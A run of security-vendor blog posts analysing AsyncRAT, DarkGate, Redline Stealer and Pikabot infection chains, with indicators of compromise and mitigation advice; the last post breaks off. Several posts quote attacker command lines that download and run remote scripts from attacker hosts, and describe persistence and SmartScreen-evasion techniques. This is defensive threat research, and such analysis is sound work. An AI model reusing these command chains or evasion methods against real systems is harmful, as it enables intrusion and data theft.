To summarize, the command sets up a scheduled task called “cafee” which is designed to execute the “app.js” script found in the C:\Users\Public\ directory every 2 minutes. The primary purpose of this script is to maintain persistence on the system.

Figure 9: Schedule task entry

c) Now “app.js” is executed and it executes “t.bat” from the same folder.

Figure 10:app.js

d) “t.bat” has little obfuscated code which after concatenating becomes: “Powershell.exe -ExecutionPolicy Bypass -File “”C:\Users\Public\t.ps1”

Figure 11: Content of t.bat

e) Now the powershell script “t.ps1” is invoked. This is the main script that is responsible for injection.

Figure 12: Content of t.ps1

There are 2 functions defined in it:

A) function fun_alosh()
This function is used in the last for decoding $tLx and $Uk

B) Function FH ()
This function is used only once to decode the content of “C:\\Users\\Public\\Framework.txt”. This function takes a binary string as input, converts it into a sequence of ASCII characters, and returns the resulting string.

Figure 13: Content of Framework.txt

After decoding the contents of “C:\Users\Public\Framework.txt” using CyberChef, we are able to reveal the name of the final binary file targeted for injection.

Figure 14: Binary to Hex, Hex to Ascii Conversion using CyberChef

This technique aims to evade detection by concealing suspicious keywords within the script. Same way other keywords are also stored in txt files, such as:

Content of other text files are:

Figure 15: Content of other files

After replacing all the names and reframing sentences. Below is the result.

Figure 16: Injection code

Now, the two variables left are decrypted by fun_alosh.

After decrypting and saving them, it was discovered that both files are PE files, with one being a DLL ($tLx) and the other an exe ($Uk).

Figure 17: Decoded binaries

Process injection in aspnet_compiler.exe.

Figure 18:  Process injection in aspnet_compiler.exe

Once all background tasks are finished, a deceptive Amazon page emerges solely to entice the user.

Figure 19: Fake Amazon page

Analysis of Binaries:

The Dll file is packed with confuserEX and as shown, the type is mentioned ‘NewPE2.PE’ and Method is mentioned ‘Execute’.

Figure 20: Confuser packed DLL

The second file is named AsyncClient123 which is highly obfuscated.

Figure 21: AsyncRat payload

To summarize the main execution flow of “AsyncRAT”, we can outline the following steps:

• Initialize its configuration (decrypts the strings).
• Verifies and creates a Mutex (to avoid running duplicated instances).
• If configured through the settings, the program will automatically exit upon detecting a virtualized or analysis environment.
• Establishes persistence in the system.
• Collect data from the victim’s machine.
• Establish a connection with the server.

The decrypting function is used to decrypt strings.

Figure 22: Decrypting Function

The program creates a mutex to prevent multiple instances from running simultaneously.

Figure 23: Creating Mutex

Figure 24: Mutex in process explorer

Checking the presence of a debugger.

Figure 25: Anti analysis code

Collecting data from the system.

Figure 26: Code for collecting data from system

Establish a connection with the server.

Figure 27: Code for C2 connection

Process injection in aspnet_compiler.exe:

Figure 28: C2 communication

Conclusion:

In this blog post, we dissect the entire attack sequence of AsyncRAT, beginning with an HTML file that triggers the download of a WSF file, and culminating in the injection of the final payload. Such tactics are frequently employed by attackers to gain an initial foothold. We anticipate a rise in the utilization of these file types following Microsoft’s implementation of protections against malicious Microsoft Office macros, which have also been widely exploited for malware delivery. McAfee labs consistently advise users to refrain from opening files from unknown sources, particularly those received via email. For organizations, we highly recommend conducting security training for employees and implementing a secure web gateway equipped with advanced threat protection. This setup enables real-time scanning and detection of malicious files, enhancing organizational security.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date
• Use the latest and patched version of Acrobat reader

IOCs (Indicators of compromise):

File	SHA256
HTML	969c50f319a591b79037ca50cda55a1bcf2c4284e6ea090a68210039034211db
WSF	ec6805562419e16de9609e2a210464d58801c8b8be964f876cf062e4ab52681a
ty.zip	daee41645adcf22576def12cb42576a07ed5f181a71d3f241c2c14271aad308b
basta.js	909ec84dfa3f2a00431a20d4b8a241f2959cac2ea402692fd46f4b7dbf247e90
node.bat	569e33818e6af315b5f290442f9e27dc6c56a25259d9c9866b2ffb4176d07103
app.js	7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81
t.bat	e2d30095e7825589c3ebd198f31e4c24e213d9f43fc3bb1ab2cf06b70c6eac1d
t.ps1	a0c40aa214cb28caaf1a2f5db136bb079780f05cba50e84bbaeed101f0de7fb3
exe	0d6bc7db43872fc4d012124447d3d050b123200b720d305324ec7631f739d98d
dll	b46cd34f7a2d3db257343501fe47bdab67e796700f150b8c51a28bb30650c28f
URL	hxxp://142.202.240[.]40:222/1.txt
URL	hxxp://142.202.240[.]40:222/r.jpg

 

The post From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats appeared first on McAfee Blog.

The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen

Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena

McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:

Figure 1: Geo-Distribution of DarkGate

DarkGate’s attempt to bypass Defender Smartscreen

Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.

In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about “Internet Shortcut Files Security Feature Bypass Vulnerability”.

Infection Chain

McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:

Figure 2: Infection Chain

Infection from HTML:

The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.

Figure 3: HTML page

Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.

Figure 4: Prompt confirming redirection to Windows Explorer

Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.

Figure 5: Share Internet Shortcut via SMB

In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.

Figure 6: Javascript in HTML code

On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:

Figure 7: WebDAV share

The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.

Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.

The file is an Internet Shortcut (.url) file, containing the following content:

Figure 8: content of .URL file

The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.

Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.

The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.

If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:

Figure 9: SmartScreen prompt

On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:

Figure 10: Process tree

Following are the command lines:

• “C:\Windows\System32\WScript.exe” “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”
  • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘withupdate.com/zuyagaoq’)
    • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    • “C:\rjtu\AutoHotkey.exe” C:/rjtu/script.ahk
    • “C:\Windows\system32\attrib.exe” +h C:/rjtu/

The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).

Inspecting the URL “withupdate.com/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:

Figure 11: Remote Script on the C2

This URL leads to a script:

Figure 12: Remote Script contentReformatting, we get:

Figure 13: Remote script content

Explanation of the script:

• ni ‘C:/rjtu/’ -Type Directory -Force: This command creates a new directory named “rjtu” in the root of the C drive if it doesn’t already exist.
• cd ‘C:/rjtu/’: This changes the current directory to the newly created “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/oudowibspr” -OutFile ‘C:/rjtu/temp_AutoHotkey.exe’: This command downloads a file from the specified URL and saves it as “temp_AutoHotkey.exe” in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/rwlwiwbv” -OutFile ‘C:/rjtu/script.ahk’: This downloads a file named “script.ahk” from another specified URL and saves it in the “rjtu” directory.
• Invoke-WebRequest -Uri “http://withupdate.com/bisglrkb” -OutFile ‘C:/rjtu/test.txt’: This downloads a file named “test.txt” from yet another specified URL and saves it in the “rjtu” directory.
• start ‘C:/rjtu/AutoHotkey.exe’ -a ‘C:/rjtu/script.ahk’: This command starts the executable “AutoHotkey.exe” located in the “rjtu” directory and passes “script.ahk” file as an argument.
• attrib +h ‘C:/rjtu/’: This sets the hidden attribute for the “rjtu” directory.

Checking “C:/rjtu”:

Figure 14: Dropped folder

AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.

To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).

Following is the ahk script file content:

Figure 15: Content of .ahk script

There are a lot of comments added in the script, simplifying the script, we get:

Figure 16: .ahk script after removing junk

This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.

Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:

Figure 17: Content of test.txt

We analyzed the memory in use for Autohotkey.exe.

Figure 18: Memory of running instance of AutoHotKey.exeWe dumped the memory associated with it and found that it was the same as the content in test.txt.

Figure 19: Memory dump of running AutoHotKey.exe same as test.txt

This is the shellcode present here.  The first 6 bytes are assembly instructions:

Figure 20: Shellcode A in the beginning

Following the jump instructions of 3bf bytes, we reach the same set of instructions again:

Figure 21: Same Shellcode A after jump

This means another jump with be taken for another 3bf bytes:

Figure 22: Same Shellcode A one more time

We have encountered same set of instructions again, taking another jump we reach to:

Figure 23: New Shellcode B found next.

These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.

Figure 24: Shellcode B followed by PE file highlighted

This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:

Figure 25: After debugging found next Shellcode C

This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.

Figure 26: Shellcode C directing to entry point of the PE file

Upon debugging this code, we figured out that in marked “call eax” instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.

This is the final DarkGate payload which is a Delphi-compiled executable file:

Figure 27: Darkgate payload.

Upon this, we see all the network activity happening to C2 site:

Figure 28: Network Communication

Figure 29: C2 IP address

The exfiltration is done to the IP address 5.252.177.207.

Persistence:

For maintaining persistence, a .lnk file is dropped in startup folder:

Figure 30: Persistence

Content of lnk file:

Figure 31: Content of .lnk used for persistence

The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.

Figure 32: Folder dropped in “C:\ProgramData”

Inside this folder, all the same files are present:

Figure 33: Same set of files present in dropped folder

Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.

Infection from XLS:

The malicious excel file asks the user to click on “Open” to view the content properly.

Figure 34: XLS sample

Upon clicking on “Open” button, user gets the following prompt warning the user before opening the file.

Figure 35: XLS files trying to download and run VBS file

For our analysis, we allowed the activity by clicking on “OK”. Following this we got the process tree as:

Figure 36: Process tree from Excel file

The command lines are:

• “C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE” “C:\Users\admin\Documents\Cluster\10-apr-xls\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx”
  • “C:\Windows\System32\WScript.exe” “\\45.89.53.187\s\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -Command Invoke-Expression (Invoke-RestMethod -Uri ‘103.124.106.237/wctaehcw’)
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\kady\AutoHotkey.exe” C:/kady/script.ahk
      • “C:\Windows\system32\attrib.exe” +h C:/kady/

The file it gets from “103.124.106[.]237/wctaehcw” has the following content:

Figure 37: Remote script simliar to previous chain

From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.

Mitigation:

• Verify Sender Information
• Think Before Clicking Links and Warnings
• Check for Spelling and Grammar Errors
• Be Cautious with Email Content
• Verify Unusual Requests
• Use Email Spam Filters
• Check for Secure HTTP Connections
• Delete Suspicious Emails
• Keep Windows and Security Software Up to date

Indicators of Compromise (IoCs):

File	Hash
Html file	196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
URL file	2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833
VBS	038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907
autohotkey.exe	897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
AHK script	dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455
test.txt	4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795
DarkGate exe	6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031
IP	5.252.177.207
XLS file	1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4
VBS	2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
LNK file	10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e
IP	103.124.106.237

Table 1: IOC table

The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.

Redline Stealer: A Novel Approach

Authored by Mohansundaram M and Neil Tyagi

A new packed variant of the Redline Stealer trojan was observed in the wild, leveraging Lua bytecode to perform malicious behavior.

McAfee telemetry data shows this malware strain is very prevalent, covering North America, South America, Europe, and Asia and reaching Australia.

Infection Chain

 

• GitHub was being abused to host the malware file at Microsoft’s official account in the vcpkg repository https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip

• McAfee Web Advisor blocks access to this malicious download
• Cheat.Lab.2.7.2.zip is a zip file with hash 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
• The zip file contains an MSI installer.

• The MSI installer contains 2 PE files and a purported text file.
  
• Compiler.exe and lua51.dll are binaries from the Lua project. However, they are modified slightly by a threat actor to serve their purpose; they are used here with readme.txt (Which contains the Lua bytecode) to compile and execute at Runtime.
• Lua JIT is a Just-In-Time Compiler (JIT) for the Lua programming language.
  
• The magic number 1B 4C 4A 02 typically corresponds to Lua 5.1 bytecode.
• The above image is readme.txt, which contains the Lua bytecode. This approach provides the advantage of obfuscating malicious stings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor.
• Upon execution, the MSI installer displays a user interface.

• During installation, a text message is displayed urging the user to spread the malware by installing it onto a friend’s computer to get the full application version.

• During installation, we can observe that three files are being written to Disk to C:\program Files\Cheat Lab Inc\ Cheat Lab\ path.

• Below, the three files are placed inside the new path.

 

• • Here, we see that compiler.exe is executed by msiexec.exe and takes readme.txt as an argument. Also, the Blue Highlighted part shows lua51.dll being loaded into compiler.exe. Lua51.dll is a supporting DLL for compiler.exe to function, so the threat actor has shipped the DLL along with the two files.
    

• • During installation, msiexec.exe creates a scheduled task to execute compiler.exe with readme.txt as an argument.
  • Apart from the above technique for persistence, this malware uses a 2^nd fallback technique to ensure execution.
  • It copies the three files to another folder in program data with a very long and random path.

• Note that the name compiler.exe has been changed to NzUW.exe.
• Then it drops a file ErrorHandler.cmd at C:\Windows\Setup\Scripts\
• The contents of cmd can be seen here. It executes compiler.exe under the new name of NzUw.exe with the Lua byte code as a parameter.

• Executing ErrorHandler.cmd uses a LolBin in the system32 folder. For that, it creates another scheduled task.

 

• • The above image shows a new task created with Windows Setup, which will launch C:\Windows\system32\oobe\Setup.exe without any argument.
  • Turns out, if you place your payload in c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd, c:\WINDOWS\system32\oobe\Setup.exe will load it whenever an error occurs.
    

 

Source: Add a Custom Script to Windows Setup | Microsoft Learn

• • c:\WINDOWS\system32\oobe\Setup.exe is expecting an argument. When it is not provided, it causes an error, which leads to the execution of ErrorHandler.cmd, which executes compiler.exe, which loads the malicious Lua code.
  • We can confirm this in the below process tree.
    

We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with ErrorHandler.cmd script as argument, which runs NzUw.exe(compiler.exe)

• • It then checks the IP from where it is being executed and uses ip-API to achieve that.

 

• • We can see the network packet from api-api.com; this is written as a JSON object to Disk in the inetCache folder.
    

• • We can see procmon logs for the same.
    

• We can see JSON was written to Disk.

C2 Communication and stealer activity

• • Communication with c2 occurs over HTTP.

• • We can see that the server sent the task ID of OTMsOTYs for the infected machine to perform. (in this case, taking screenshots)
    
  • A base64 encoded string is returned.

• • 

• • An HTTP PUT request was sent to the threat actors server with the URL /loader/screen.
  • IP is attributed to the redline family, with many engines marking it as malicious.
    
    

• Further inspection of the packet shows it is a bitmap image file.
• The name of the file is Screen.bmp
• Also, note the unique user agent used in this put request, i.e., Winter

• After Dumping the bitmap image resource from Wireshark to disc and opening it as a .bmp(bitmap image) extension, we see.
• The screenshot was sent to the threat actors’ server.

Analysis of bytecode File

• It is challenging to get the true decomplication of the bytecode file.
• Many open source decompilers were used, giving a slightly different Lua script.
• The script file was not compiling and throwing some errors.

• The script file was sensitized based on errors so that it could be compiled.

• Debugging process

• One table (var_0_19) is populated by passing data values to 2 functions.
• In the console output, we can see base64 encoded values being stored in var_0_19.
• These base64 strings decode to more encoded data and not to plain strings.

• All data in var_0_19 is assigned to var_0_26

• • The same technique is populating 2nd table (var_0_20)
  • It contains the substitution key for encoded data.
    

• • The above pic is a decryption loop. It iterates over var_0_26 element by element and decrypts it.
  • This loop is also very long and contains many junk lines.
  • The loop ends with assigning the decrypted values back to var_0_26.
    
    

 

• • We place the breakpoint on line 1174 and watch the values of var_0_26.
    

• • As we hit the breakpoint multiple times, we see more encoded data decrypted in the watch window.
    

 

• We can see decrypted strings like Tamper Detected! In var_0_26

Loading luajit bytcode:

Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.

It loads the library using the Lua_openlib function and loads the debug, io, math,ffi, and other supported libraries,

Lua jit bytecode loaded using the luaL_loadfile export function from lua51. It uses the fread function to read the jit bytecode, and then it moves to the allocated memory using the memmove function.

 

The bytecode from the readme. Text is moved randomly, changing the bytecode from one offset to another using the memmove API function. The exact length of 200 bytes from the Jit bytecode is copied using the memmove API function.

It took table values and processed them using the below floating-point arithmetic and xor instruction.

It uses memmove API functions to move the bytes from the source to the destination buffer.

After further analysis, we found that c definition for variable and arguments which will be used in this script.

We have seen some API definitions, and it uses ffi for directly accessing Windows API functions from Lua code, examples of defining API functions,

 

It creates the mutex with the name winter750 using CreateMutexExW.

It Loads the dll at Runtime using the LdrLoaddll function from ntdll.dll. This function is called using luajit ffi.

It retrieves the MachineGuid from the Windows registry using the RegQueryValueEx function by using ffi. Opens the registry key “SOFTWARE\\Microsoft\\Cryptography” using RegOpenKeyExA—queries the value of “MachineGuid” from the opened registry key.

It retrieves the ComputerName from the Windows registry using the GetComputerNameA function using ffi.

It gathers the following information and sends it to the C2 server.

It also sends the following information to the c2 server,

• In this blog, we saw the various techniques threat actors use to infiltrate user systems and exfiltrate their data.

Indicators of Compromise

Cheat.Lab.2.7.2.zip	5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
Cheat.Lab.2.7.2.zip	https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip
lua51.dll	873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997
readme.txt	751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad
compiler.exe	dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a
Redline C2	213[.]248[.]43[.]58
Trojanised Git Repo	hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip

 

The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.

Distinctive Campaign Evolution of Pikabot Malware

Authored by Anuradha and Preksha

Introduction

PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.

Distribution Methods

PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.

SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.

Distinctive Campaigns

During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.

Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.

Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.

Figure 1. Distinctive Campaigns of Pikabot

Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.

1. HTML
2. Javascript
3. SMB Share
4. Excel
5. JAR

It is uncommon for an adversary to deploy so many attack vectors in the span of a month.

Campaign Analysis

In this section, a comprehensive breakdown of the analysis for each campaign is presented below.

1.HTML Campaign

In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.

The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.

Figure 2.HTML Code

The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.

Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:

Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.

Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.

Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.

In this campaign, McAfee blocks the HTML file.

Figure 3.HTML file

2. Javascript Campaign

Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.

Infection Chain:

.zip->.js->curl->.exe

Code snippet of .js file:

Figure 4. Javascript Code

When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.

Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.

Commandline:

‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’

McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.

Figure 5. JS file

Figure 6. EXE file

3. SMB share Campaign:

In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.

Infection Chain:

EML ->SMB share link->.zip->.exe

Spam Email:

Figure 7. Spam email with SMB share link

SMB Share link: file://newssocialwork.com/public/FNFY.zip

In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.

Figure 8. EXE file

 4: Excel Campaign

Figure 9. Face in Excel

Infection Chain:

.zip >.xls > .js > .dll

This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”

Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.

Bundled files in Excel:

Figure 10. Bundled files inside Excel

The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.

The hyperlink is present in the below relationship file.

Figure 11. XML relationship file

Content of relationship file:

Figure 12. xl/drawings/_rels/drawing1.xml.rels

Code of JS file:

Figure 13. Obfuscated javascript code

The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.

Figure 14. Calling regsvr32.exe

The downloaded DLL payload is executed by regsvr32.exe.

In this campaign, McAfee blocks the XLSX file.

Figure 15. XLSX file

5.JAR Campaign

In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.

Infection Chain:

.zip>.jar>.dll

On extraction, the below files are found inside the jar file.

Figure 16. Extraction of JAR file

The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.

The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.

Figure 17. Payload with .png extension

Following this, java.exe initiates the execution of regsvr32.exe to run the payload.

In this campaign, McAfee blocks both the JAR and DLL files.

Figure 18. JAR file

Figure 19. DLL file

Pikabot Payload Analysis:

Pikabot loader:

Due to a relatively high entropy of the resource section, the sample appears packed.

Figure 20. Loader Entropy

Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.

Figure 21. Decryption Loop

Figure 22. Decrypted to get the PE file

Core Module:

Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”

Figure 23. Injection with ctfmon.exe

To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.

Figure 24. Mutex

Network communication:

